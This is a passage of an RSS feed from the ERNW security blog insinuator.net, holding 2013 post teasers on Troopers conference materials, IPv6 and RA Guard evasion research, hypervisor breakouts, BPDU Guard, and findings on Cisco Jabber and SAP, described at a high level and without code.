      <description>&lt;p&gt;Hi,&lt;/p&gt;&#xA;&lt;p&gt;as we’ve received quite some requests re: the videos from &lt;a href=&#34;http://www.troopers.de&#34;&gt;Troopers&lt;/a&gt; 2013: the YouTube playlist can be found &lt;a href=&#34;https://www.youtube.com/playlist?list=PL1eoQr97VfJl1LdMzyQPz71uR6bwiUGog&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Have fun (and learn something ;-)) watching, cu next year&lt;/p&gt;&#xA;&lt;p&gt;Enno&lt;/p&gt;</description>
    </item>
    <item>
      <title>Analysis of Hypervisor Breakouts</title>
      <link>https://insinuator.net/2013/05/analysis-of-hypervisor-breakouts/</link>
      <pubDate>Mon, 20 May 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/05/analysis-of-hypervisor-breakouts/</guid>
      <description>&lt;p&gt;In the course of a current virtualization research project, I was reviewing a lot of documentation on hypervisor security. While “hypervisor security” is a very wide field, hypervisor breakouts are usually one of the most (intensely) discussed topics. I don’t want to go down the road of rating the risk of hypervisor breakouts and giving appropriate recommendations (even though we do this on a regular base which, surprisingly often, leads to almost religious debates. I know I say this way too often:I’ll cover this topic in a future post ;)), but share a few observations of analyzing well-known examples of vulnerabilities that led to guest-to-host-escape scenarios. The following table provides an overview of the vulnerabilities in question:&lt;/p&gt;</description>
    </item>
    <item>
      <title>RA Guard (Evasion) – We Stand Corrected</title>
      <link>https://insinuator.net/2013/05/ra-guard-evasion-we-stand-corrected/</link>
      <pubDate>Mon, 20 May 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/05/ra-guard-evasion-we-stand-corrected/</guid>
      <description>&lt;p&gt;Recently  &lt;a href=&#34;http://6lab.cz/article/author/xpivar00/&#34; title=&#34;Posts by Jozef Pivarník&#34;&gt;Jozef Pivarník&lt;/a&gt; and &lt;a href=&#34;http://6lab.cz/article/author/gregr/&#34; title=&#34;Posts by Matěj Grégr&#34;&gt;Matěj Grégr&lt;/a&gt; published an &lt;a href=&#34;http://6lab.cz/article/rogue-router-advertisement-attack/&#34;&gt;excellent write-up&lt;/a&gt; on RA Guard &amp;amp; evasion techniques. Amongst others they tested the “undetermined-transport” ACL we described &lt;a href=&#34;http://www.insinuator.net/2013/04/some-more-notes-on-ra-guard-evasion-and-undetermined-transport/&#34;&gt;here&lt;/a&gt; and &lt;a href=&#34;http://www.insinuator.net/2012/03/the-story-continues-another-ipv6-update/&#34;&gt;here&lt;/a&gt;. As it turns out the “workaround” for implementing &lt;em&gt;undetermined-transport&lt;/em&gt; on platforms seemingly not supporting it, causes some bad collateral damage: the respective port does not forward &lt;em&gt;any&lt;/em&gt; IPv6 packets any more (this was brought to my attention by Roberto Taccon). We had done some tests after applying it (by means of the “workaround”) but we had just looked at fragmented RA packets (which did not get through =&amp;gt; test succeeded). So, frankly: the undetermined-transport trick does not make sense at all on the “unsupported platforms”…&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Attacks &amp; Pentesting Workshops</title>
      <link>https://insinuator.net/2013/05/ipv6-attacks-pentesting-workshops/</link>
      <pubDate>Tue, 14 May 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/05/ipv6-attacks-pentesting-workshops/</guid>
      <description>&lt;p&gt;Due to “popular demand” and given &lt;a href=&#34;http://www.mh-sec.de/&#34;&gt;Marc&lt;/a&gt; couldn’t join us at the &lt;a href=&#34;https://www.troopers.de/archives/troopers13/agenda13/troopers13-ipv6-security-summit-2013/index.html&#34;&gt;IPv6 Security Summit&lt;/a&gt; (as flights into FRA were canceled that day due to snow) we decided to invite him and &lt;a href=&#34;https://www.troopers.de/archives/troopers13/agenda13/troopers13-ipv6-security-summit-2013/troopers13-ipv6-security-summit-2013-presentations/index.html#extension_headers&#34;&gt;Antonios Atlasis&lt;/a&gt; another time, to present their knowledge, skills &amp;amp; voodoo in two workshops held in Heidelberg, in late June. More details can be found &lt;a href=&#34;https://www.ernw.de/newsfeed/ipv6-attacks-pentesting-workshops/index.html&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;See you all potentially at the Heise IPv6 Kongress, take care&lt;/p&gt;&#xA;&lt;p&gt;Enno&lt;/p&gt;&#xA;&lt;p&gt; &lt;/p&gt;</description>
    </item>
    <item>
      <title>RA Guard Support</title>
      <link>https://insinuator.net/2013/05/ra-guard-support/</link>
      <pubDate>Thu, 02 May 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/05/ra-guard-support/</guid>
      <description>&lt;p&gt;Hi,&lt;/p&gt;&#xA;&lt;p&gt;on the &lt;a href=&#34;http://lists.cluenet.de/mailman/listinfo/ipv6-ops&#34;&gt;[ipv6-ops]&lt;/a&gt; mailing list currently there’s some discussion about RA guard support on switches from different vendors.&lt;/p&gt;&#xA;&lt;p&gt;Stefan, one of our students (btw: working on a topic similar to this &lt;a href=&#34;https://www.troopers.de/archives/troopers13/agenda13/troopers13-ipv6-security-summit-2013/troopers13-ipv6-security-summit-2013-workshop-overview-of-the-real-world-capabilities-of-major-commercial-security-products/index.html&#34;&gt;session&lt;/a&gt;), quickly put together a preliminary list, based on publicly available information (read: the WWW ;-)). Some of you may find this useful; it can be found &lt;a href=&#34;https://www.ernw.de/download/raguard_support_05022013.pdf&#34;&gt;here&lt;/a&gt;. Furthermore on the list &lt;a href=&#34;http://www.forwardingplane.net/2011/03/ipv6-features-matrix-for-network-hardware/&#34;&gt;this link&lt;/a&gt; was mentioned which seems to provide some info as well (albeit potentially not very up-to-date).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Presentations from TR13 TelcoSecDay Online</title>
      <link>https://insinuator.net/2013/04/presentations-from-tr13-telcosecday-online/</link>
      <pubDate>Sun, 28 Apr 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/04/presentations-from-tr13-telcosecday-online/</guid>
      <description>&lt;p&gt;Hi,&lt;/p&gt;&#xA;&lt;p&gt;just to let you know that all presentations from this year’s &lt;a href=&#34;https://www.troopers.de/archives/troopers13/agenda13/troopers13-telcosec-day-2013/index.html&#34;&gt;TelcoSecDay&lt;/a&gt; are published in the interim. (Harald [Welte] couldn’t participate as in the morning of that day FRA airport was closed on short notice).&lt;/p&gt;&#xA;&lt;p&gt;Next year’s TSD will happen on 03/18/2014.&lt;/p&gt;&#xA;&lt;p&gt;Take care,&lt;/p&gt;&#xA;&lt;p&gt;Enno&lt;/p&gt;&#xA;&lt;p&gt; &lt;/p&gt;</description>
    </item>
    <item>
      <title>Microsoft Surface RT, a quick insight</title>
      <link>https://insinuator.net/2013/04/microsoft-surface-rt-a-quick-insight/</link>
      <pubDate>Wed, 24 Apr 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/04/microsoft-surface-rt-a-quick-insight/</guid>
      <description>&lt;p&gt;After being on the market for a few months now, Microsoft started quite a large advertising campaign in Germany for its new &lt;em&gt;Surface RT&lt;/em&gt; . We had a comprehensive look at the new tablet PC and here are a few thoughts and impressions:&lt;/p&gt;&#xA;&lt;p&gt;Running a slightly reduced ARM version of Windows 8, I heard somebody calling it “Windows 8 Home”, which in comparison to older versions hits the spot, Microsoft offers an easily usable interface. Software is reduced to market apps (the minimal run level on a plain Windows is 0, any, and 8, Microsoft, on Windows RT), so you can’t just install your favourite app, or can you?&lt;/p&gt;</description>
    </item>
    <item>
      <title>BPDU Guard in Virtualized Environments (2)</title>
      <link>https://insinuator.net/2013/04/bpdu-guard-in-virtualized-environments-2/</link>
      <pubDate>Wed, 17 Apr 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/04/bpdu-guard-in-virtualized-environments-2/</guid>
      <description>&lt;p&gt;Just a quick update here: Ivan (who gave the magnificent &lt;a href=&#34;https://www.troopers.de/archives/troopers13/agenda13/troopers13-presentations/index.html#virtual_firewalls&#34;&gt;Virtual Firewalls&lt;/a&gt; talk at &lt;a href=&#34;http://www.troopers.de&#34;&gt;Troopers&lt;/a&gt; recently) blogged about this and some guy added some feedback from an environment with Cisco FEX and “one of the server guys start[ing] a Citrix Netscaler” ;-). See the second comment to his &lt;a href=&#34;http://blog.ioshints.info/2013/04/vm-bpdu-spoofing-attack-works-quite.html&#34;&gt;post&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;This shows, once more, that the dependencies of various technologies (and what they are used for) must be well understood in cloud/virtualized environments. Complexity … but who do we tell. Y’ all know that, right?&lt;/p&gt;</description>
    </item>
    <item>
      <title>Summary of Talks Held at HITB 2013 – Day 1</title>
      <link>https://insinuator.net/2013/04/summary-of-talks-held-at-hitb-2013-day-1/</link>
      <pubDate>Wed, 17 Apr 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/04/summary-of-talks-held-at-hitb-2013-day-1/</guid>
      <description>&lt;p&gt;This is a short summary of some selected talks from the first day of this year’s &lt;a href=&#34;http://conference.hackinthebox.org/hitbsecconf2013ams/&#34; title=&#34;Hack In The Box&#34;&gt;Hack in the Box&lt;/a&gt; conference in Amsterdam.&lt;/p&gt;&#xA;&lt;p&gt; &lt;br&gt;&#xA;&lt;strong&gt;Abusing Twitter’s API and OAuth Implementation by Nicolas Seriot&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;Nicolas Seriot (&lt;a href=&#34;https://twitter.com/nst021&#34;&gt;https://twitter.com/nst021&lt;/a&gt;) is an iOS Cocoa developer with an interest in privacy and security. He is currently a mobile applications developer and project manager in Switzerland. Nicolas focused his talk on the extraction of consumer tokens that are needed for OAuth to authenticate a consumer to a service provider. These tokens can then be used by rogue applications to gain access to a victims twitter account.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Summary of Talks Held at HITB 2013 – Day 2</title>
      <link>https://insinuator.net/2013/04/summary-of-talks-held-at-hitb-2013-day-2/</link>
      <pubDate>Wed, 17 Apr 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/04/summary-of-talks-held-at-hitb-2013-day-2/</guid>
      <description>&lt;p&gt;This is a short summary of some selected talks from the second day of this year’s Hack in the Box conference in Amsterdam.&lt;/p&gt;&#xA;&lt;p&gt; &lt;br&gt;&#xA;&lt;strong&gt;Rethinking the Front Lines by Bob Lord&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;Bob Lord is currently the Director of Information Security at Twitter. He has worked at numerous companies in the area of security and software engineering.&lt;/p&gt;&#xA;&lt;p&gt;In his keynote for the second day of HITB13AMS he tackled a topic that has raised a lot of discussions in the past months. His talk was a summary of what twitter does internally to ensure the security of the company and a plea to implement so called security awareness trainings for employees in a sustainable way.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Some more Notes on RA Guard Evasion and “undetermined-transport”</title>
      <link>https://insinuator.net/2013/04/some-more-notes-on-ra-guard-evasion-and-undetermined-transport/</link>
      <pubDate>Sat, 13 Apr 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/04/some-more-notes-on-ra-guard-evasion-and-undetermined-transport/</guid>
      <description>&lt;p&gt;I just had an interesting discussion with Jim Small (who gives the “IPv6 Attacks and Countermeasures” talk at the &lt;a href=&#34;http://rmv6tf.org/na-ipv6-summit/2013-na-ipv6-summit/2013-agendaspeakers&#34;&gt;North American IPv6 Summit&lt;/a&gt; next week) about the feasibility of the “undetermined-transport” keyword in PACLs on Cisco 3560 switches (here running  IOS 15.0(2)SE). Actually there’s some kind-of funny behavior as for it on that platform (and there’s even some &lt;a href=&#34;http://www.cisco.com/en/US/docs/switches/lan/catalyst3750/software/release/15.0_2_se/configuration/guide/swv6acl.html#wp4334642&#34;&gt;Cisco documentation stating it’s not supported&lt;/a&gt;). Let’s have a look, and start with a quick refresher.&lt;/p&gt;</description>
    </item>
    <item>
      <title>3 Ways for 3-Letter-Agencies to get your Government Proof, Indecipherable Cloud Text Messages</title>
      <link>https://insinuator.net/2013/04/3-ways-for-3-letter-agencies-to-get-your-government-proof-indecipherable-cloud-text-messages/</link>
      <pubDate>Wed, 10 Apr 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/04/3-ways-for-3-letter-agencies-to-get-your-government-proof-indecipherable-cloud-text-messages/</guid>
      <description>&lt;p&gt;The &lt;a href=&#34;http://gritsforbreakfast.blogspot.de/2013/04/encryption-for-cloud-communications-may.html&#34;&gt;gritsforbreakfast blog post&lt;/a&gt; making the rounds on the &lt;a href=&#34;https://mailman.stanford.edu/pipermail/liberationtech/2013-April/008100.html&#34;&gt;Liberation Tech mailing list&lt;/a&gt; about security of Apple’s iMessaging service is gaining quite some attention. The post refers to a &lt;a href=&#34;http://news.cnet.com/8301-13578_3-57577887-38/apples-imessage-encryption-trips-up-feds-surveillance/&#34;&gt;CNET article&lt;/a&gt; on how the iMessage service “stymied attempts by federal drug enforcement agents to eavesdrop” conversations due its end-to-end encryption and commends Apple for protecting the user’s privacy while pointing out that Gmail and Facebook Messaging don’t. However, I disagree on some points of the blog post and therefore want to discuss them here.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Thoughts on Cloud Governance, Part 1</title>
      <link>https://insinuator.net/2013/04/thoughts-on-cloud-governance-part-1/</link>
      <pubDate>Fri, 05 Apr 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/04/thoughts-on-cloud-governance-part-1/</guid>
      <description>&lt;p&gt;Last week Rapid7 &lt;a href=&#34;https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets&#34;&gt;posted&lt;/a&gt; an interesting analysis of the Amazon S3 storage system: Apparently roughly one out of six S3 buckets (a bucket is, simply said, a kind of folder) is accessible without any authentication mechanism. Accessing those files, the &lt;a href=&#34;http://www.rapid7.com/&#34;&gt;Rapid7&lt;/a&gt; guys were able to download a &lt;a href=&#34;http://www.google.com/search?q=site%3As3.amazonaws.com+filetype%3Axls+password&amp;amp;btnG=Search&amp;amp;client=opera&amp;amp;oe=utf-8&amp;amp;channel=suggest&amp;amp;gbv=1&#34;&gt;wide range of data&lt;/a&gt;, also comprising confidential information such as source code or employee information, comparable to past research for &lt;a href=&#34;http://blog.rootshell.be/2012/05/19/what-are-you-sharing-with-dropbox/&#34;&gt;other platforms&lt;/a&gt; (see also this presentation I gave on some of the &lt;a href=&#34;https://www.ernw.de/download/ERNW_BastaSpring13_CloudFails.pdf&#34;&gt;biggest Cloud #Fails&lt;/a&gt;)&lt;/p&gt;</description>
    </item>
    <item>
      <title>BPDU Guard: Bringing Down Infrastructures</title>
      <link>https://insinuator.net/2013/04/bpdu-guard-bringing-down-infrastructures/</link>
      <pubDate>Thu, 04 Apr 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/04/bpdu-guard-bringing-down-infrastructures/</guid>
      <description>&lt;p&gt;As you may already be familiar with some of our &lt;a href=&#34;http://www.insinuator.net/2012/05/vmdk-has-left-the-building/&#34;&gt;previous&lt;/a&gt; &lt;a href=&#34;https://www.ernw.de/download/ERNW_Newsletter_41_ExploitingVirtualFileFormats_signed.pdf&#34;&gt;work&lt;/a&gt; which was mainly focused on isolation issues of hypervisors, we also want to present you an issue concerning availability in Cloud environments. This issue was already covered in some of our &lt;a href=&#34;https://www.ernw.de/download/ERNW_DCVI-HypervisorsToClouds.pdf&#34;&gt;presentations&lt;/a&gt;, but will be explained in greater detail in this blog post.&lt;/p&gt;&#xA;&lt;p&gt;In the course of one of our security assessments of a public IaaS Cloud environment, we experienced the following network setting:&lt;/p&gt;</description>
    </item>
    <item>
      <title>A Word on Cisco Jabber</title>
      <link>https://insinuator.net/2013/04/a-word-on-cisco-jabber/</link>
      <pubDate>Wed, 03 Apr 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/04/a-word-on-cisco-jabber/</guid>
      <description>&lt;p&gt;Recently we took a look on Ciscos XMPP client, called Cisco Jabber. The Client is used in combination with Ciscos Unified Communication Server (CUCM) and Ciscos Unified Presence Server (CUPS). Only the latter one is used for XMPP communication.&lt;/p&gt;&#xA;&lt;p&gt;We built a small lab setup with this components (CUCM, CUPS and the Win7 Client) and watched the client working.&lt;/p&gt;&#xA;&lt;p&gt;First the client connects to a web service at https://CUPS:8443/EPASSoap/service/v80. We intercepted this connection with the Burp Proxy and had no problems getting into the SSL. Inside we found a SOAP request containing the users authentication credentials and a SOAP response with a onetime password, which is used for authentication in the XMPP stream later on. Phew, the users credentials _and_ unlimited onetime passwords _that_ easy? Thanks Cisco!&lt;/p&gt;</description>
    </item>
    <item>
      <title>TROOPERS13 – The Badge Code</title>
      <link>https://insinuator.net/2013/03/troopers13-the-badge-code/</link>
      <pubDate>Fri, 15 Mar 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/03/troopers13-the-badge-code/</guid>
      <description>&lt;p&gt;As a lot of people were asking for, here comes the code of your badge. All You need to customize your badge, is a micro controller programmer, like the &lt;a href=&#34;http://www.microchip.com/pickit3&#34;&gt;Pickit&lt;/a&gt; (its around 30 to 40 euros) and the build environment, &lt;a href=&#34;http://www.microchip.com/mplabx/&#34;&gt;MPLAB&lt;/a&gt; which you can get for free. Then just &lt;a href=&#34;https://www.ernw.de/download/tr13_badge.tar.bz2&#34;&gt;download the code&lt;/a&gt; and implement your own super cool features. Let us know what you did, the best hacks will get into the TROOPERS hall of fame (-;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers13 IPv6 Security Summit – First Presentations Available</title>
      <link>https://insinuator.net/2013/03/troopers13-ipv6-security-summit-first-presentations-available/</link>
      <pubDate>Mon, 11 Mar 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/03/troopers13-ipv6-security-summit-first-presentations-available/</guid>
      <description>&lt;p&gt;We had a great day today at the &lt;a href=&#34;https://www.troopers.de/agenda13/troopers13-ipv6-security-summit-2013/index.html&#34;&gt;Troopers IPv6 Security Summit&lt;/a&gt;. Good conversations, quite some technical discussion and a prevailing overall will to improve actual IPv6 network security.&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://www.ernw.de/download/IPv6%20Extension%20Headers%20-%20New%20Features,%20and%20New%20Attack%20Vectors.pdf&#34;&gt;Here&lt;/a&gt; are the slides of Antonios Atlasis’ great talk on extension headers and &lt;a href=&#34;https://www.ernw.de/download/IPv6%20Extension%20Headers%20-%20New%20Features,%20and%20New%20Attack%20Vectors.py&#34;&gt;these&lt;/a&gt; are some of his accompanying Python/Scapy scripts. My own presentation on high secure IPv6 networks can be found &lt;a href=&#34;https://www.ernw.de/download/ERNW_TR13_High_Secure_Networks_v1_0web.pdf&#34;&gt;here&lt;/a&gt;. The slides of the &lt;a href=&#34;https://www.troopers.de/agenda13/troopers13-ipv6-security-summit-2013/troopers13-ipv6-security-summit-2013-workshop-overview-of-the-real-world-capabilities-of-major-commercial-security-products/index.html&#34;&gt;real-world capabilities workshop&lt;/a&gt; will not be published yet as we first have to discuss some stuff with a vendor.&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Neighbor Cache Exhaustion Attacks – Risk Assessment &amp; Mitigation Strategies, Part 1</title>
      <link>https://insinuator.net/2013/03/ipv6-neighbor-cache-exhaustion-attacks-risk-assessment-mitigation-strategies-part-1/</link>
      <pubDate>Tue, 05 Mar 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/03/ipv6-neighbor-cache-exhaustion-attacks-risk-assessment-mitigation-strategies-part-1/</guid>
      <description>&lt;p&gt;Recently there has been quite some discussion about so-called neighbor cache exhaustion (“NCE”) attacks in the IPv6 world. &lt;a href=&#34;http://inconcepts.biz/~jsw/IPv6_NDP_Exhaustion.pdf&#34;&gt;This&lt;/a&gt; is Jeff Wheeler’s “classic paper” on the subject, my kind-of personal networking guru &lt;a href=&#34;https://www.troopers.de/agenda13/troopers13-presentations/index.html#virtual_firewalls&#34;&gt;Ivan Pepelnjak&lt;/a&gt; &lt;a href=&#34;http://blog.ioshints.info/2011/05/ipv6-neighbor-discovery-exhaustion.html&#34;&gt;blogged&lt;/a&gt; about it back some time, &lt;a href=&#34;https://groups.google.com/forum/?fromgroups=#!topic/ipv6hackers/cFCcsjnhImw&#34;&gt;here&lt;/a&gt;‘s a related discussion on the IPv6 hackers mailing list and in March 2012 (only three months after the respective IETF draft’s version 0 was released) the &lt;a href=&#34;%20https://tools.ietf.org/html/rfc6583&#34;&gt;RFC 6583&lt;/a&gt; was published, covering various protection strategies.&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Security Problems Related to Extension Headers &amp; Fragmentation</title>
      <link>https://insinuator.net/2013/03/ipv6-security-problems-related-to-extension-headers-fragmentation/</link>
      <pubDate>Mon, 04 Mar 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/03/ipv6-security-problems-related-to-extension-headers-fragmentation/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;http://www.mh-sec.de/&#34;&gt;Marc Heuse&lt;/a&gt; – who happens to give &lt;a href=&#34;https://www.troopers.de/agenda13/troopers13-ipv6-security-summit-2013/troopers13-ipv6-security-summit-2013-workshop-penetration-testing-in-ipv6-networks/index.html&#34;&gt;this workshop&lt;/a&gt; at the &lt;a href=&#34;https://www.troopers.de/agenda13/troopers13-ipv6-security-summit-2013/index.html&#34;&gt;Troopers IPv6 Security Summit&lt;/a&gt; next week – just sent &lt;a href=&#34;http://lists.si6networks.com/pipermail/ipv6hackers/2013-March/000972.html&#34;&gt;this email&lt;/a&gt; (subject: “Remote system freeze thanks to Kaspersky Internet Security 2013”) to the &lt;a href=&#34;http://lists.si6networks.com/listinfo/ipv6hackers/&#34;&gt;IPv6 hackers mailing list&lt;/a&gt;, describing how a system running a certain flavor of Kaspersky security products can be remotely frozen when receiving IPv6 packets with a specific combination of extension headers and fragmentation (which in turn can be easily generated by his &lt;a href=&#34;www.thc.org/thc-ipv6&#34;&gt;IPv6 protocol attack suite&lt;/a&gt;).&lt;/p&gt;</description>
    </item>
    <item>
      <title>BASTA! Spring 2013</title>
      <link>https://insinuator.net/2013/02/basta-spring-2013/</link>
      <pubDate>Thu, 28 Feb 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/02/basta-spring-2013/</guid>
      <description>&lt;p&gt;Yesterday I was giving two presentations about Cloud security at the &lt;a href=&#34;http://basta.net/&#34;&gt;BASTA!&lt;/a&gt; Spring 2013 Security Day. While my presentations covered Microsoft Azure security considerations (which also included a part of the Cloud security approach covered in our &lt;a href=&#34;https://www.troopers.de/agenda13/troopers13-1-day-workshop-auditing-the-cloud/index.html&#34;&gt;workshops&lt;/a&gt;; slides available &lt;a href=&#34;https://www.ernw.de/download/ERNW_BastaSpring13_AzureSec.pdf&#34;&gt;here&lt;/a&gt;) and some major Cloud incidents (suitable to transport different messages about Cloud security in general ;); slides available &lt;a href=&#34;https://www.ernw.de/download/ERNW_BastaSpring13_CloudFails.pdf&#34;&gt;here&lt;/a&gt;), I also saw &lt;a href=&#34;http://leastprivilege.com/&#34;&gt;Dominick’s&lt;/a&gt; very interesting &lt;a href=&#34;https://speakerdeck.com/leastprivilege/windows-8-security-for-developers&#34;&gt;presentation&lt;/a&gt; about security aspects and changes in Windows 8. Inspired by that, we hope to be able to publish another blogpost on those aspects with regard to enterprise environments soon — most likely we won’t find any time for it before &lt;a href=&#34;http://www.troopers.de&#34;&gt;TROOPERS&lt;/a&gt; 😉&lt;/p&gt;</description>
    </item>
    <item>
      <title>Latest SAP threats, SAP Forensics &amp;amp; BIZEC @Troopers!</title>
      <link>https://insinuator.net/2013/02/latest-sap-threats-sap-forensics-amp-bizec-@troopers/</link>
      <pubDate>Wed, 27 Feb 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/02/latest-sap-threats-sap-forensics-amp-bizec-@troopers/</guid>
      <description>&lt;h3 id=&#34;this-is-a-guest-post-from-mariano-nunez-and-juan-perez-etchegoyen&#34;&gt;This is a guest post from &lt;a href=&#34;https://www.troopers.de/agenda13/troopers13-1-day-workshop-sap-security-protecting-your-sap-systems-against-hackers-and-industrial-espionage/index.html&#34;&gt;Mariano Nunez and Juan Perez-Etchegoyen&lt;/a&gt;&lt;/h3&gt;&#xA;&lt;p&gt;Juan Perez-Etchegoyen (&lt;a href=&#34;https://twitter.com/intent/user?screen_name=jp_pereze&#34;&gt;@jp_pereze&lt;/a&gt;) and Mariano Nunez (&lt;a href=&#34;https://twitter.com/intent/user?screen_name=marianonunezdc&#34;&gt;@marianonunezdc&lt;/a&gt;) from &lt;a href=&#34;http://www.onapsis.com/&#34;&gt;Onapsis&lt;/a&gt; here, thrilled to be &lt;a href=&#34;https://www.troopers.de&#34;&gt;troopers&lt;/a&gt; for the third time! In this post we want to share with you a glimpse of what you will see regarding SAP security at this amazing conference.&lt;/p&gt;&#xA;&lt;p&gt;Last week we released advisories regarding several vulnerabilities affecting SAP platforms. Some of these vulnerabilities are in fact very critical, and their exploitation could lead to a &lt;strong&gt;full-compromise&lt;/strong&gt; of the entire SAP implementation – even &lt;strong&gt;by completely anonymous attackers&lt;/strong&gt;. Following our responsible disclosure policy, SAP released the relevant SAP Security Notes (patches) for all these vulnerabilities a long time ago, so if you are an SAP customer make sure you have properly implemented them!&lt;/p&gt;</description>
    </item>
    <item>
      <title>VMDK Has Left the Building — Newsletter</title>
      <link>https://insinuator.net/2013/02/vmdk-has-left-the-building-newsletter/</link>
      <pubDate>Sat, 23 Feb 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/02/vmdk-has-left-the-building-newsletter/</guid>
      <description>&lt;p&gt;We are pleased to announce that we summarized the results from our &lt;a href=&#34;http://www.insinuator.net/2012/05/vmdk-has-left-the-building/&#34;&gt;VMDK research&lt;/a&gt; in our latest newsletter.&lt;/p&gt;&#xA;&lt;p&gt;We hope you enjoy the reading and will get some “food for thought”!&lt;/p&gt;&#xA;&lt;p&gt;The newsletter can be found at:&lt;br&gt;&#xA;&lt;a href=&#34;https://www.ernw.de/download/ERNW_Newsletter_41_ExploitingVirtualFileFormats.pdf&#34;&gt;ERNW_Newsletter_41_ExploitingVirtualFileFormats.pd&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;A digitally signed version can be found at:&lt;br&gt;&#xA;&lt;a href=&#34;https://www.ernw.de/download/ERNW_Newsletter_41_ExploitingVirtualFileFormats_signed.pdf&#34;&gt;ERNW_Newsletter_41_ExploitingVirtualFileFormats_signed.pdf&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;Enjoy your weekend,&lt;br&gt;&#xA;Matthias&lt;/p&gt;</description>
    </item>
    <item>
      <title>APT</title>
      <link>https://insinuator.net/2013/02/apt/</link>
      <pubDate>Thu, 21 Feb 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/02/apt/</guid>
      <description>&lt;p&gt;Many of you have probably seen the public media coverage (e.g. [&lt;a href=&#34;http://www.nytimes.com/2013/02/19/technology/chinas-army-is-seen-as-tied-to-hacking-against-us.html?hp&amp;amp;_r=0&#34;&gt;1&lt;/a&gt;], [&lt;a href=&#34;http://www.spiegel.de/politik/ausland/chinas-armee-soll-beruechtigte-hacker-truppe-betreiben-a-884164.html&#34;&gt;2&lt;/a&gt;]) of  Mandiant’s &lt;a href=&#34;http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf&#34;&gt;latest report&lt;/a&gt; on APT.&lt;/p&gt;&#xA;&lt;p&gt;Just to let you know: &lt;a href=&#34;https://www.troopers.de/agenda13/index.html&#34;&gt;Trooper&lt;/a&gt;‘s traditional panel discussion on the first day will be on APT this year. So if you want to discuss the topic with other practitioners from the field, join us there.&lt;/p&gt;&#xA;&lt;p&gt;have a great day&lt;/p&gt;&#xA;&lt;p&gt;Enno&lt;/p&gt;</description>
    </item>
    <item>
      <title>Bluevoxing</title>
      <link>https://insinuator.net/2013/02/bluevoxing/</link>
      <pubDate>Thu, 21 Feb 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/02/bluevoxing/</guid>
      <description>&lt;h3 id=&#34;this-is-a-guest-post-from-graeme-neilson&#34;&gt;This is a guest post from &lt;a href=&#34;https://www.troopers.de/agenda13/troopers13-2-day-workshop-reverse-engineering/index.html&#34;&gt;Graeme Neilson&lt;/a&gt;&lt;/h3&gt;&#xA;&lt;p&gt;Reverse engineering is generally thought of as using debuggers, disassemblers and hex editors. Much as I love hex editors, IDA and staring at opcodes for the last few years I have been focused on applying my reverse engineering methodology to larger, composed systems. At &lt;a href=&#34;https://www.troopers.de/agenda13/troopers13-telcosec-day-2013/index.html&#34;&gt;Troopers TelcoSec day&lt;/a&gt; this year I will be presenting &lt;a href=&#34;https://www.troopers.de/agenda13/troopers13-telcosec-day-2013/index.html#BlueVoxing&#34;&gt;Bluevoxing&lt;/a&gt; which demonstrates how this approach works. &lt;a href=&#34;https://www.troopers.de/agenda13/troopers13-telcosec-day-2013/index.html#BlueVoxing&#34;&gt;Bluevoxing&lt;/a&gt; is about reverse engineering how web based “audio one time password” systems work. Simply put audio one time password systems use a short audio file as an authentication token. When I discovered these systems I was intrigued as reversing them would involve a range of techniques and tools from web testing, audio tools, signal analysis, phreaking and cryptanalysis. The disassembler would be of no use instead I would have to employ audio tools such as audacity and ruby-processing.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Corporate Espionage via Mobile Compromise: A technical deep dive</title>
      <link>https://insinuator.net/2013/02/corporate-espionage-via-mobile-compromise-a-technical-deep-dive/</link>
      <pubDate>Tue, 19 Feb 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/02/corporate-espionage-via-mobile-compromise-a-technical-deep-dive/</guid>
